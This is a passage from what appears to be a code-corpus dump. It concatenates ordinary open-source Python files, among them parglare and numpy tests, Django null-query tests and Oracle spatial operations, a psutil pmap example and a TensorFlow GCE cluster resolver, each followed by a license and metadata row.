if t.name == 'A':
assert t.prior == 15
else:
assert t.prior == DEFAULT_PRIORITY
def test_no_terminal_associavitity():
"Tests that terminals can't have associativity defined."
grammar = """
S: A | B;
terminals
A: 'a' {15, left};
B: 'b';
"""
with pytest.raises(ParseError) as e:
Grammar.from_string(grammar)
assert 'Expected: : but found <NotComment(};)> or <}(})>' \
in str(e.value)
def test_terminal_empty_body():
"""
Test that terminals may have empty bodies (when defined using
recognizers)
"""
grammar = """
S: A | B;
terminals
A: {15};
B: ;
"""
g = Grammar.from_string(grammar, recognizers={'B': None, 'A': None})
a = g.get_terminal('A')
assert a.prior == 15
b = g.get_terminal('B')
assert b.recognizer is None
def test_terminal_regexp_with_backslash():
"""Regexp terminals can contain (escaped) backslash."""
grammar = Grammar.from_string(r"""
start: t1 t2;
terminals
t1: /\\/;
t2: /a/;
""")
t1 = grammar.get_terminal('t1')
assert t1.recognizer._regex == '\\\\'
assert t1.recognizer('\\', 0) == '\\'
def test_builtin_grammar_action():
"""
Builtin actions can be referenced from a grammar.
"""
grammar = """
@collect
Ones: Ones One | One;
terminals
One: "1";
"""
g = Grammar.from_string(grammar)
ones = g.get_nonterminal('Ones')
from parglare.actions import collect
assert ones.action == collect
p = Parser(g)
result = p.parse('1 1 1 1 1')
assert result == "1 1 1 1 1".split()
def test_multiple_grammar_action_raises_error():
"""
If multiple actions are given for the same non-terminal GrammarError
should be raised.
"""
grammar = """
S: Ones;
@collect
Ones: Ones One | One;
@something
Ones: 'foo';
terminals
One: "1";
"""
# Actions 'collect' and 'something' defined for rule 'Ones'
with pytest.raises(GrammarError) as e:
Grammar.from_string(grammar)
assert 'Multiple' in str(e.value)
def test_action_override():
"""
Explicitely provided action in `actions` param overrides default or
grammar provided.
"""
grammar = """
S: Foo Bar;
@pass_nochange
Bar: "1" a;
terminals
@pass_nochange
Foo: 'foo';
a: "a";
"""
g = Grammar.from_string(grammar)
p = Parser(g)
input_str = "foo 1 a"
result = p.parse(input_str)
assert result == ["foo", ["1", "a"]]
actions = {
"Foo": lambda _, __: "eggs",
"Bar": lambda _, __: "bar reduce"}
p = Parser(g, actions=actions)
result = p.parse(input_str)
assert result == ["eggs", "bar reduce"]
# Test with actions call postponing
p = Parser(g, build_tree=True, actions=actions)
tree = p.parse(input_str)
result = p.call_actions(tree)
assert result == ["eggs", "bar reduce"]
def assignment_in_productions(prods, symbol_name, assgn_name):
found = False
for p in prods:
if p.symbol.name == symbol_name:
found = assgn_name in p.assignments
return found
def test_assignment_plain():
"""
Test plain assignment.
"""
grammar = """
S: "1" first=some_match "3";
terminals
some_match: "2";
"""
g = Grammar.from_string(grammar)
assert assignment_in_productions(g.productions, 'S', 'first')
called = [False]
def act_s(_, nodes, first):
called[0] = True
assert first == "2"
return nodes
actions = {
"S": act_s
}
p = Parser(g, actions=actions)
input_str = '1 2 3'
result = p.parse(input_str)
assert result == ["1", "2", "3"]
assert called[0]
def test_assignment_bool():
"""
Test bool assignment.
"""
grammar = """
S: "1" first?=some_match "3";
terminals
some_match: "2";
"""
g = Grammar.from_string(grammar)
assert assignment_in_productions(g.productions, 'S', 'first')
called = [False]
def act_s(_, nodes, first):
called[0] = True
assert first is True
return nodes
actions = {
"S": act_s
}
p = Parser(g, actions=actions)
input_str = '1 2 3'
result = p.parse(input_str)
assert result == ["1", "2", "3"]
assert called[0]
def test_assignment_of_repetition():
"""
Test assignment of repetition.
"""
grammar = """
S: "1" first=some_match+ "3";
terminals
some_match: "2";
"""
g = Grammar.from_string(grammar)
assert assignment_in_productions(g.productions, 'S', 'first')
called = [False]
def act_s(_, nodes, first):
called[0] = True
assert first == ["2", "2"]
return nodes
actions = {
"S": act_s
}
p = Parser(g, actions=actions)
input_str = '1 2 2 3'
result = p.parse(input_str)
assert result == ["1", ["2", "2"], "3"]
assert called[0]
def test_assignment_of_repetition_with_sep():
"""
Test assignment of repetition.
"""
grammar = """
S: "1" first=some_match+[comma] "3";
terminals
some_match: "2";
comma: ",";
"""
g = Grammar.from_string(grammar)
assert assignment_in_productions(g.productions, 'S', 'first')
called = [False]
def act_s(_, nodes, first):
called[0] = True
assert first == ["2", "2"]
return nodes
actions = {
"S": act_s
}
p = Parser(g, actions=actions)
input_str = '1 2, 2 3'
result = p.parse(input_str)
assert result == ["1", ["2", "2"], "3"]
assert called[0]
def test_multiple_assignment_with_repetitions():
"""
Test assignment of repetition.
"""
grammar = """
S: "1" first=some_match+[comma] second?=some_match* "3";
terminals
some_match: "2";
comma: ",";
"""
g = Grammar.from_string(grammar)
assert assignment_in_productions(g.productions, 'S', 'first')
assert assignment_in_productions(g.productions, 'S', 'second')
called = [False]
def act_s(_, nodes, first, second):
called[0] = True
assert first == ["2", "2"]
assert second is True
return nodes
actions = {
"S": act_s
}
p = Parser(g, actions=actions)
input_str = '1 2, 2 2 2 2 3'
result = p.parse(input_str)
assert result == ["1", ["2", "2"], ["2", "2", "2"], "3"]
assert called[0]
def test_case_insensitive_parsing():
"""
By default parglare is case sensitive. This test parsing without case
sensitivity.
"""
grammar = r"""
S: "one" "Two" Astart;
terminals
Astart: /Aa\w+/;
"""
g = Grammar.from_string(grammar)
# By default parsing is case sensitive for both string and regex matches.
parser = Parser(g)
with pytest.raises(ParseError):
parser.parse('One Two Aaa')
with pytest.raises(ParseError):
parser.parse('one Two AAa')
g = Grammar.from_string(grammar, ignore_case=True)
parser = Parser(g)
parser.parse('One Two Aaa')
parser.parse('one Two AAa')
| mit | -8,498,248,226,509,463,000 | 19.711968 | 79 | 0.565958 | false |
DGrady/pandas | pandas/tests/computation/test_compat.py | 11 | 1308 | import pytest
from distutils.version import LooseVersion
import pandas as pd
from pandas.core.computation.engines import _engines
import pandas.core.computation.expr as expr
from pandas.core.computation import _MIN_NUMEXPR_VERSION
def test_compat():
# test we have compat with our version of nu
from pandas.core.computation import _NUMEXPR_INSTALLED
try:
import numexpr as ne
ver = ne.__version__
if ver < LooseVersion(_MIN_NUMEXPR_VERSION):
assert not _NUMEXPR_INSTALLED
else:
assert _NUMEXPR_INSTALLED
except ImportError:
pytest.skip("not testing numexpr version compat")
@pytest.mark.parametrize('engine', _engines)
@pytest.mark.parametrize('parser', expr._parsers)
def test_invalid_numexpr_version(engine, parser):
def testit():
a, b = 1, 2 # noqa
res = pd.eval('a + b', engine=engine, parser=parser)
assert res == 3
if engine == 'numexpr':
try:
import numexpr as ne
except ImportError:
pytest.skip("no numexpr")
else:
if ne.__version__ < LooseVersion(_MIN_NUMEXPR_VERSION):
with pytest.raises(ImportError):
testit()
else:
testit()
else:
testit()
| bsd-3-clause | 7,998,924,532,500,616,000 | 27.434783 | 67 | 0.616208 | false |
lunixbochs/fs-uae-gles | launcher/fs_uae_launcher/fsui/wx/choice.py | 1 | 1037 | from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import wx
from .common import update_class
class Choice(wx.Choice):
def __init__(self, parent, items=[]):
wx.Choice.__init__(self, parent.get_container(), -1,
wx.DefaultPosition, wx.DefaultSize, items)
if len(items) > 0:
self.SetSelection(0)
self.Bind(wx.EVT_CHOICE, self.__choice_event)
def get_min_width(self):
return self.GetBestSize()[0]
def get_min_height(self):
return self.GetBestSize()[1]
def set_position(self, position):
self.SetPosition(position)
def set_size(self, size):
self.SetSize(size)
def get_index(self):
return self.GetSelection()
def set_index(self, index):
self.SetSelection(index)
def on_change(self):
print("Choice.on_change")
def __choice_event(self, event):
self.on_change()
update_class(Choice)
| gpl-2.0 | -8,796,235,951,678,419,000 | 23.292683 | 60 | 0.59595 | false |
YuanYouYuan/FreeCAD | src/Tools/MakeAppTools.py | 32 | 2611 | import os, sys, re,string,FCFileTools
verbose = 0
dcount = fcount = 0
def replaceTemplate(dirName, oldName, newName):
"""
modify contents from dirName and below, replace oldName by newName
"""
for file in os.listdir(dirName):
pathName = os.path.join(dirName, file)
if not os.path.isdir(pathName):
try:
print pathName
origFile = open(pathName) # open file
lines = origFile.readlines() # read the file...
origFile.close() # ... and close it
output = open(pathName,"w") # open the file again
for line in lines:
if (string.find(line, oldName) != -1): # search for 'oldName' and replace it
line = string.replace(line, oldName, newName)
output.write(line) # write the modified line back
output.close # close the file
except:
print 'Error modifying', pathName, '--skipped'
print sys.exc_type, sys.exc_value
else:
try:
replaceTemplate(pathName, oldName, newName)
except:
print 'Error changing to directory', pathName, '--skipped'
print sys.exc_type, sys.exc_value
def copyTemplate(dirFrom, dirTo, oldName, newName, MatchFile, MatchDir):
"""
copy contents of dirFrom and below to dirTo
"""
global dcount, fcount
for file in os.listdir(dirFrom): # for files/dirs here
print file
pathFrom = os.path.join(dirFrom, file)
pathTo = os.path.join(dirTo, file) # extend both paths
if (string.find(pathTo, oldName) != -1):
pathTo = string.replace(pathTo, oldName, newName) # rename file if 'oldName' is found
if not os.path.isdir(pathFrom): # copy simple files
hit = 0
for matchpat in MatchFile:
if(re.match(matchpat,file)):
hit = 1
break
if hit:
print 'Ignore file '+file
continue
try:
if verbose > 1: print 'copying', pathFrom, 'to', pathTo
FCFileTools.cpfile(pathFrom, pathTo)
fcount = fcount+1
except:
print 'Error copying', pathFrom, 'to', pathTo, '--skipped'
print sys.exc_type, sys.exc_value
else:
hit = 0
for matchpat in MatchDir:
if(re.match(matchpat,file)):
hit = 1
break
if hit:
print 'Ignore directory '+file
continue
if verbose: print 'copying dir', pathFrom, 'to', pathTo
try:
os.mkdir(pathTo) # make new subdir
copyTemplate(pathFrom, pathTo, oldName, newName, MatchFile, MatchDir) # recur into subdirs
dcount = dcount+1
except:
print 'Error creating', pathTo, '--skipped'
print sys.exc_type, sys.exc_value
| lgpl-2.1 | -2,565,172,866,029,309,400 | 31.909091 | 96 | 0.623516 | false |
synasius/django | tests/null_queries/tests.py | 36 | 2939 | from __future__ import unicode_literals
from django.core.exceptions import FieldError
from django.test import TestCase
from .models import Choice, Inner, OuterA, OuterB, Poll
class NullQueriesTests(TestCase):
def test_none_as_null(self):
"""
Regression test for the use of None as a query value.
None is interpreted as an SQL NULL, but only in __exact and __iexact
queries.
Set up some initial polls and choices
"""
p1 = Poll(question='Why?')
p1.save()
c1 = Choice(poll=p1, choice='Because.')
c1.save()
c2 = Choice(poll=p1, choice='Why Not?')
c2.save()
# Exact query with value None returns nothing ("is NULL" in sql,
# but every 'id' field has a value).
self.assertQuerysetEqual(Choice.objects.filter(choice__exact=None), [])
# The same behavior for iexact query.
self.assertQuerysetEqual(Choice.objects.filter(choice__iexact=None), [])
# Excluding the previous result returns everything.
self.assertQuerysetEqual(
Choice.objects.exclude(choice=None).order_by('id'),
[
'<Choice: Choice: Because. in poll Q: Why? >',
'<Choice: Choice: Why Not? in poll Q: Why? >'
]
)
# Valid query, but fails because foo isn't a keyword
self.assertRaises(FieldError, Choice.objects.filter, foo__exact=None)
# Can't use None on anything other than __exact and __iexact
self.assertRaises(ValueError, Choice.objects.filter, id__gt=None)
# Related managers use __exact=None implicitly if the object hasn't been saved.
p2 = Poll(question="How?")
self.assertEqual(repr(p2.choice_set.all()), '<QuerySet []>')
def test_reverse_relations(self):
"""
Querying across reverse relations and then another relation should
insert outer joins correctly so as not to exclude results.
"""
obj = OuterA.objects.create()
self.assertQuerysetEqual(
OuterA.objects.filter(inner__third=None),
['<OuterA: OuterA object>']
)
self.assertQuerysetEqual(
OuterA.objects.filter(inner__third__data=None),
['<OuterA: OuterA object>']
)
Inner.objects.create(first=obj)
self.assertQuerysetEqual(
Inner.objects.filter(first__inner__third=None),
['<Inner: Inner object>']
)
# Ticket #13815: check if <reverse>_isnull=False does not produce
# faulty empty lists
OuterB.objects.create(data="reverse")
self.assertQuerysetEqual(
OuterB.objects.filter(inner__isnull=False),
[]
)
Inner.objects.create(first=obj)
self.assertQuerysetEqual(
OuterB.objects.exclude(inner__isnull=False),
['<OuterB: OuterB object>']
)
| bsd-3-clause | -9,054,589,427,036,456,000 | 33.988095 | 87 | 0.601905 | false |
chen0031/Dato-Core | src/unity/python_deps/psutil/examples/pmap.py | 43 | 1983 | #!/usr/bin/env python
# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
A clone of 'pmap' utility on Linux, 'vmmap' on OSX and 'procstat -v' on BSD.
Report memory map of a process.
$ python examples/pmap.py 32402
pid=32402, name=hg
Address RSS Mode Mapping
0000000000400000 1200K r-xp /usr/bin/python2.7
0000000000838000 4K r--p /usr/bin/python2.7
0000000000839000 304K rw-p /usr/bin/python2.7
00000000008ae000 68K rw-p [anon]
000000000275e000 5396K rw-p [heap]
00002b29bb1e0000 124K r-xp /lib/x86_64-linux-gnu/ld-2.17.so
00002b29bb203000 8K rw-p [anon]
00002b29bb220000 528K rw-p [anon]
00002b29bb2d8000 768K rw-p [anon]
00002b29bb402000 4K r--p /lib/x86_64-linux-gnu/ld-2.17.so
00002b29bb403000 8K rw-p /lib/x86_64-linux-gnu/ld-2.17.so
00002b29bb405000 60K r-xp /lib/x86_64-linux-gnu/libpthread-2.17.so
00002b29bb41d000 0K ---p /lib/x86_64-linux-gnu/libpthread-2.17.so
00007fff94be6000 48K rw-p [stack]
00007fff94dd1000 4K r-xp [vdso]
ffffffffff600000 0K r-xp [vsyscall]
...
"""
import sys
import psutil
from psutil._compat import print_
def main():
if len(sys.argv) != 2:
sys.exit('usage: pmap <pid>')
p = psutil.Process(int(sys.argv[1]))
print_("pid=%s, name=%s" % (p.pid, p.name()))
templ = "%-16s %10s %-7s %s"
print_(templ % ("Address", "RSS", "Mode", "Mapping"))
total_rss = 0
for m in p.memory_maps(grouped=False):
total_rss += m.rss
print_(templ % (
m.addr.split('-')[0].zfill(16),
str(m.rss / 1024) + 'K',
m.perms,
m.path))
print_("-" * 33)
print_(templ % ("Total", str(total_rss / 1024) + 'K', '', ''))
if __name__ == '__main__':
main()
| agpl-3.0 | -2,561,654,710,117,017,600 | 33.189655 | 77 | 0.589007 | false |
wuga214/Django-Wuga | env/lib/python2.7/site-packages/django/contrib/gis/db/backends/oracle/operations.py | 18 | 10848 | """
This module contains the spatial lookup types, and the `get_geo_where_clause`
routine for Oracle Spatial.
Please note that WKT support is broken on the XE version, and thus
this backend will not work on such platforms. Specifically, XE lacks
support for an internal JVM, and Java libraries are required to use
the WKT constructors.
"""
import re
from django.contrib.gis.db.backends.base.operations import \
BaseSpatialOperations
from django.contrib.gis.db.backends.oracle.adapter import OracleSpatialAdapter
from django.contrib.gis.db.backends.utils import SpatialOperator
from django.contrib.gis.db.models import aggregates
from django.contrib.gis.geometry.backend import Geometry
from django.contrib.gis.measure import Distance
from django.db.backends.oracle.operations import DatabaseOperations
from django.utils import six
from django.utils.functional import cached_property
DEFAULT_TOLERANCE = '0.05'
class SDOOperator(SpatialOperator):
sql_template = "%(func)s(%(lhs)s, %(rhs)s) = 'TRUE'"
class SDODistance(SpatialOperator):
sql_template = "SDO_GEOM.SDO_DISTANCE(%%(lhs)s, %%(rhs)s, %s) %%(op)s %%(value)s" % DEFAULT_TOLERANCE
class SDODWithin(SpatialOperator):
sql_template = "SDO_WITHIN_DISTANCE(%(lhs)s, %(rhs)s, %%s) = 'TRUE'"
class SDODisjoint(SpatialOperator):
sql_template = "SDO_GEOM.RELATE(%%(lhs)s, 'DISJOINT', %%(rhs)s, %s) = 'DISJOINT'" % DEFAULT_TOLERANCE
class SDORelate(SpatialOperator):
sql_template = "SDO_RELATE(%(lhs)s, %(rhs)s, 'mask=%(mask)s') = 'TRUE'"
def check_relate_argument(self, arg):
masks = 'TOUCH|OVERLAPBDYDISJOINT|OVERLAPBDYINTERSECT|EQUAL|INSIDE|COVEREDBY|CONTAINS|COVERS|ANYINTERACT|ON'
mask_regex = re.compile(r'^(%s)(\+(%s))*$' % (masks, masks), re.I)
if not isinstance(arg, six.string_types) or not mask_regex.match(arg):
raise ValueError('Invalid SDO_RELATE mask: "%s"' % arg)
def as_sql(self, connection, lookup, template_params, sql_params):
template_params['mask'] = sql_params.pop()
return super(SDORelate, self).as_sql(connection, lookup, template_params, sql_params)
class SDOIsValid(SpatialOperator):
sql_template = "%%(func)s(%%(lhs)s, %s) = 'TRUE'" % DEFAULT_TOLERANCE
class OracleOperations(BaseSpatialOperations, DatabaseOperations):
name = 'oracle'
oracle = True
disallowed_aggregates = (aggregates.Collect, aggregates.Extent3D, aggregates.MakeLine)
Adapter = OracleSpatialAdapter
area = 'SDO_GEOM.SDO_AREA'
gml = 'SDO_UTIL.TO_GMLGEOMETRY'
centroid = 'SDO_GEOM.SDO_CENTROID'
difference = 'SDO_GEOM.SDO_DIFFERENCE'
distance = 'SDO_GEOM.SDO_DISTANCE'
extent = 'SDO_AGGR_MBR'
intersection = 'SDO_GEOM.SDO_INTERSECTION'
length = 'SDO_GEOM.SDO_LENGTH'
num_points = 'SDO_UTIL.GETNUMVERTICES'
perimeter = length
point_on_surface = 'SDO_GEOM.SDO_POINTONSURFACE'
reverse = 'SDO_UTIL.REVERSE_LINESTRING'
sym_difference = 'SDO_GEOM.SDO_XOR'
transform = 'SDO_CS.TRANSFORM'
union = 'SDO_GEOM.SDO_UNION'
unionagg = 'SDO_AGGR_UNION'
from_text = 'SDO_GEOMETRY'
function_names = {
'Area': 'SDO_GEOM.SDO_AREA',
'BoundingCircle': 'SDO_GEOM.SDO_MBC',
'Centroid': 'SDO_GEOM.SDO_CENTROID',
'Difference': 'SDO_GEOM.SDO_DIFFERENCE',
'Distance': 'SDO_GEOM.SDO_DISTANCE',
'Intersection': 'SDO_GEOM.SDO_INTERSECTION',
'IsValid': 'SDO_GEOM.VALIDATE_GEOMETRY_WITH_CONTEXT',
'Length': 'SDO_GEOM.SDO_LENGTH',
'NumGeometries': 'SDO_UTIL.GETNUMELEM',
'NumPoints': 'SDO_UTIL.GETNUMVERTICES',
'Perimeter': 'SDO_GEOM.SDO_LENGTH',
'PointOnSurface': 'SDO_GEOM.SDO_POINTONSURFACE',
'Reverse': 'SDO_UTIL.REVERSE_LINESTRING',
'SymDifference': 'SDO_GEOM.SDO_XOR',
'Transform': 'SDO_CS.TRANSFORM',
'Union': 'SDO_GEOM.SDO_UNION',
}
# We want to get SDO Geometries as WKT because it is much easier to
# instantiate GEOS proxies from WKT than SDO_GEOMETRY(...) strings.
# However, this adversely affects performance (i.e., Java is called
# to convert to WKT on every query). If someone wishes to write a
# SDO_GEOMETRY(...) parser in Python, let me know =)
select = 'SDO_UTIL.TO_WKTGEOMETRY(%s)'
gis_operators = {
'contains': SDOOperator(func='SDO_CONTAINS'),
'coveredby': SDOOperator(func='SDO_COVEREDBY'),
'covers': SDOOperator(func='SDO_COVERS'),
'disjoint': SDODisjoint(),
'intersects': SDOOperator(func='SDO_OVERLAPBDYINTERSECT'), # TODO: Is this really the same as ST_Intersects()?
'isvalid': SDOIsValid(func='SDO_GEOM.VALIDATE_GEOMETRY_WITH_CONTEXT'),
'equals': SDOOperator(func='SDO_EQUAL'),
'exact': SDOOperator(func='SDO_EQUAL'),
'overlaps': SDOOperator(func='SDO_OVERLAPS'),
'same_as': SDOOperator(func='SDO_EQUAL'),
'relate': SDORelate(), # Oracle uses a different syntax, e.g., 'mask=inside+touch'
'touches': SDOOperator(func='SDO_TOUCH'),
'within': SDOOperator(func='SDO_INSIDE'),
'distance_gt': SDODistance(op='>'),
'distance_gte': SDODistance(op='>='),
'distance_lt': SDODistance(op='<'),
'distance_lte': SDODistance(op='<='),
'dwithin': SDODWithin(),
}
truncate_params = {'relate': None}
@cached_property
def unsupported_functions(self):
unsupported = {
'AsGeoJSON', 'AsKML', 'AsSVG', 'Envelope', 'ForceRHR', 'GeoHash',
'MakeValid', 'MemSize', 'Scale', 'SnapToGrid', 'Translate',
}
if self.connection.oracle_full_version < '12.1.0.2':
unsupported.add('BoundingCircle')
return unsupported
def geo_quote_name(self, name):
return super(OracleOperations, self).geo_quote_name(name).upper()
def get_db_converters(self, expression):
converters = super(OracleOperations, self).get_db_converters(expression)
internal_type = expression.output_field.get_internal_type()
geometry_fields = (
'PointField', 'GeometryField', 'LineStringField',
'PolygonField', 'MultiPointField', 'MultiLineStringField',
'MultiPolygonField', 'GeometryCollectionField', 'GeomField',
'GMLField',
)
if internal_type in geometry_fields:
converters.append(self.convert_textfield_value)
if hasattr(expression.output_field, 'geom_type'):
converters.append(self.convert_geometry)
return converters
def convert_geometry(self, value, expression, connection, context):
if value:
value = Geometry(value)
if 'transformed_srid' in context:
value.srid = context['transformed_srid']
return value
def convert_extent(self, clob, srid):
if clob:
# Generally, Oracle returns a polygon for the extent -- however,
# it can return a single point if there's only one Point in the
# table.
ext_geom = Geometry(clob.read(), srid)
gtype = str(ext_geom.geom_type)
if gtype == 'Polygon':
# Construct the 4-tuple from the coordinates in the polygon.
shell = ext_geom.shell
ll, ur = shell[0][:2], shell[2][:2]
elif gtype == 'Point':
ll = ext_geom.coords[:2]
ur = ll
else:
raise Exception('Unexpected geometry type returned for extent: %s' % gtype)
xmin, ymin = ll
xmax, ymax = ur
return (xmin, ymin, xmax, ymax)
else:
return None
def geo_db_type(self, f):
"""
Returns the geometry database type for Oracle. Unlike other spatial
backends, no stored procedure is necessary and it's the same for all
geometry types.
"""
return 'MDSYS.SDO_GEOMETRY'
def get_distance(self, f, value, lookup_type, **kwargs):
"""
Returns the distance parameters given the value and the lookup type.
On Oracle, geometry columns with a geodetic coordinate system behave
implicitly like a geography column, and thus meters will be used as
the distance parameter on them.
"""
if not value:
return []
value = value[0]
if isinstance(value, Distance):
if f.geodetic(self.connection):
dist_param = value.m
else:
dist_param = getattr(value, Distance.unit_attname(f.units_name(self.connection)))
else:
dist_param = value
# dwithin lookups on Oracle require a special string parameter
# that starts with "distance=".
if lookup_type == 'dwithin':
dist_param = 'distance=%s' % dist_param
return [dist_param]
def get_geom_placeholder(self, f, value, compiler):
"""
Provides a proper substitution value for Geometries that are not in the
SRID of the field. Specifically, this routine will substitute in the
SDO_CS.TRANSFORM() function call.
"""
if value is None:
return 'NULL'
def transform_value(val, srid):
return val.srid != srid
if hasattr(value, 'as_sql'):
if transform_value(value, f.srid):
placeholder = '%s(%%s, %s)' % (self.transform, f.srid)
else:
placeholder = '%s'
# No geometry value used for F expression, substitute in
# the column name instead.
sql, _ = compiler.compile(value)
return placeholder % sql
else:
if transform_value(value, f.srid):
return '%s(SDO_GEOMETRY(%%s, %s), %s)' % (self.transform, value.srid, f.srid)
else:
return 'SDO_GEOMETRY(%%s, %s)' % f.srid
def spatial_aggregate_name(self, agg_name):
"""
Returns the spatial aggregate SQL name.
"""
agg_name = 'unionagg' if agg_name.lower() == 'union' else agg_name.lower()
return getattr(self, agg_name)
# Routines for getting the OGC-compliant models.
def geometry_columns(self):
from django.contrib.gis.db.backends.oracle.models import OracleGeometryColumns
return OracleGeometryColumns
def spatial_ref_sys(self):
from django.contrib.gis.db.backends.oracle.models import OracleSpatialRefSys
return OracleSpatialRefSys
def modify_insert_params(self, placeholder, params):
"""Drop out insert parameters for NULL placeholder. Needed for Oracle Spatial
backend due to #10888.
"""
if placeholder == 'NULL':
return []
return super(OracleOperations, self).modify_insert_params(placeholder, params)
| apache-2.0 | 872,274,038,253,494,000 | 38.447273 | 119 | 0.626383 | false |
lukeiwanski/tensorflow | tensorflow/contrib/cluster_resolver/python/training/gce_cluster_resolver.py | 24 | 5151 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implementation of Cluster Resolvers for GCE Instance Groups."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.cluster_resolver.python.training.cluster_resolver import ClusterResolver
from tensorflow.python.training.server_lib import ClusterSpec
_GOOGLE_API_CLIENT_INSTALLED = True
try:
from googleapiclient import discovery # pylint: disable=g-import-not-at-top
from oauth2client.client import GoogleCredentials # pylint: disable=g-import-not-at-top
except ImportError:
_GOOGLE_API_CLIENT_INSTALLED = False
class GceClusterResolver(ClusterResolver):
"""Cluster Resolver for Google Compute Engine.
This is an implementation of cluster resolvers for the Google Compute Engine
instance group platform. By specifying a project, zone, and instance group,
this will retrieve the IP address of all the instances within the instance
group and return a Cluster Resolver object suitable for use for distributed
TensorFlow.
"""
def __init__(self,
project,
zone,
instance_group,
port,
job_name='worker',
credentials='default',
service=None):
"""Creates a new GceClusterResolver object.
This takes in a few parameters and creates a GceClusterResolver project. It
will then use these parameters to query the GCE API for the IP addresses of
each instance in the instance group.
Args:
project: Name of the GCE project
zone: Zone of the GCE instance group
instance_group: Name of the GCE instance group
port: Port of the listening TensorFlow server (default: 8470)
job_name: Name of the TensorFlow job this set of instances belongs to
credentials: GCE Credentials. If nothing is specified, this defaults to
GoogleCredentials.get_application_default()
service: The GCE API object returned by the googleapiclient.discovery
function. (Default: discovery.build('compute', 'v1')). If you specify a
custom service object, then the credentials parameter will be ignored.
Raises:
ImportError: If the googleapiclient is not installed.
"""
self._project = project
self._zone = zone
self._instance_group = instance_group
self._job_name = job_name
self._port = port
self._credentials = credentials
if credentials == 'default':
if _GOOGLE_API_CLIENT_INSTALLED:
self._credentials = GoogleCredentials.get_application_default()
if service is None:
if not _GOOGLE_API_CLIENT_INSTALLED:
raise ImportError('googleapiclient must be installed before using the '
'GCE cluster resolver')
self._service = discovery.build(
'compute', 'v1',
credentials=self._credentials)
else:
self._service = service
def cluster_spec(self):
"""Returns a ClusterSpec object based on the latest instance group info.
This returns a ClusterSpec object for use based on information from the
specified instance group. We will retrieve the information from the GCE APIs
every time this method is called.
Returns:
A ClusterSpec containing host information retrieved from GCE.
"""
request_body = {'instanceState': 'RUNNING'}
request = self._service.instanceGroups().listInstances(
project=self._project,
zone=self._zone,
instanceGroups=self._instance_group,
body=request_body,
orderBy='name')
worker_list = []
while request is not None:
response = request.execute()
items = response['items']
for instance in items:
instance_name = instance['instance'].split('/')[-1]
instance_request = self._service.instances().get(
project=self._project,
zone=self._zone,
instance=instance_name)
if instance_request is not None:
instance_details = instance_request.execute()
ip_address = instance_details['networkInterfaces'][0]['networkIP']
instance_url = '%s:%s' % (ip_address, self._port)
worker_list.append(instance_url)
request = self._service.instanceGroups().listInstances_next(
previous_request=request,
previous_response=response)
worker_list.sort()
return ClusterSpec({self._job_name: worker_list})
def master(self):
return ''
| apache-2.0 | -4,945,389,010,880,792,000 | 36.057554 | 96 | 0.678703 | false |
tcheehow/MissionPlanner | Lib/site-packages/numpy/core/tests/test_npy_arraytypes.py | 54 | 5864 | import sys
import warnings
import numpy as np
from numpy.testing import *
warnings.filterwarnings('ignore',
'Casting complex values to real discards the imaginary part')
types = [np.bool_, np.byte, np.ubyte, np.short, np.ushort, np.intc, np.uintc,
np.int_, np.uint, np.longlong, np.ulonglong,
np.single, np.double, np.longdouble, np.csingle,
np.cdouble, np.clongdouble]
alltypes = list( types )
alltypes.append( np.datetime64 )
alltypes.append( np.timedelta64 )
class TestArrayTypes(TestCase):
def test_argmax( self ):
x = np.array( [False, False, True, False], dtype=np.bool )
assert x.argmax() == 2, "Broken array.argmax on np.bool"
a = np.array( [u'aaa', u'aa', u'bbb'] )
# u'aaa' > u'aa' and u'bbb' > u'aaa' Hence, argmax == 2.
assert a.argmax() == 2, "Broken array.argmax on unicode data."
a = np.array( [ 'aaa', 'aa', 'bbb'] )
# 'aaa' > 'aa' and 'bbb' > 'aaa' Hence, argmax == 2.
assert a.argmax() == 2, "Broken array.argmax on string data."
def test_argmax_numeric( self ):
# Skip the np.bool_ type as it lacks a fill function, hence can't use
# arange().
for k,t in enumerate( alltypes[1:] ):
a = np.arange( 5, dtype=t )
assert a.argmax() == 4, "Broken array.argmax on type: " + t
def test_nonzero_numeric_types( self ):
for k,t in enumerate(alltypes):
a = np.array( [ t(1) ] )
assert a, "Broken array.nonzero on type: " + t
def test_nonzero_string_types( self ):
a = np.array( [ 'aaa' ] )
assert a, "Broken array.nonzero on string elements."
a = np.array( [ u'aaa' ] )
assert a, "Broken array.nonzero on Unicode elements."
def test_compare( self ):
# Light bulb! argmax doesn't call compare() for numeric/logical
# types. It only does that for string types. Duh.
pass
def test_copyswap( self ):
# Skip np.bool_.
for k,t in enumerate( types[1:] ):
x = np.arange( 10, dtype=t )
# This should exeercise <typoe>_copyswap
x[::2].fill( t(2) )
assert_equal( x, [2,1,2,3,2,5,2,7,2,9] )
def test_copyswap_misc( self ):
x = np.array( [ u'a', u'b', u'c' ] )
x[::2].fill( u'd' )
assert_equal( x, [u'd', u'b', u'd'] )
def test_copyswapn( self ):
# bool lacks arange support.
for k,t in enumerate( alltypes[1:] ):
x = np.arange( 10, dtype=t )
y = x.byteswap()
z = y.byteswap()
assert_equal( z, x )
def test_copyswapn_misc( self ):
x = np.array( [ u'a', u'b', u'c' ] )
y = x.byteswap()
z = y.byteswap()
assert_equal( z, x )
def test_compare( self ):
for k,t in enumerate( alltypes[1:] ):
try:
a = np.arange( 10, dtype=t )
keys = a[::2]
b = a.searchsorted( keys )
c = a.copy()
np.insert( c, b, b.astype( t ) )
c.sort()
assert_equal( c, a )
except TypeError, e:
print "Trouble with type %d:" % k, e
def test_compare_bool( self ):
# bool can't handle numpy.arange(), so has to be coded separately.
a = np.array( [False, True], dtype=np.bool_ )
keys = a
b = a.searchsorted( keys )
c = a.copy()
np.insert( c, b, keys )
c.sort()
assert_equal( c, a )
def test_dot( self ):
# Do something to test dot on bool...
for k,t in enumerate( alltypes[1:] ):
a = np.arange( 3, dtype=t ) + 1
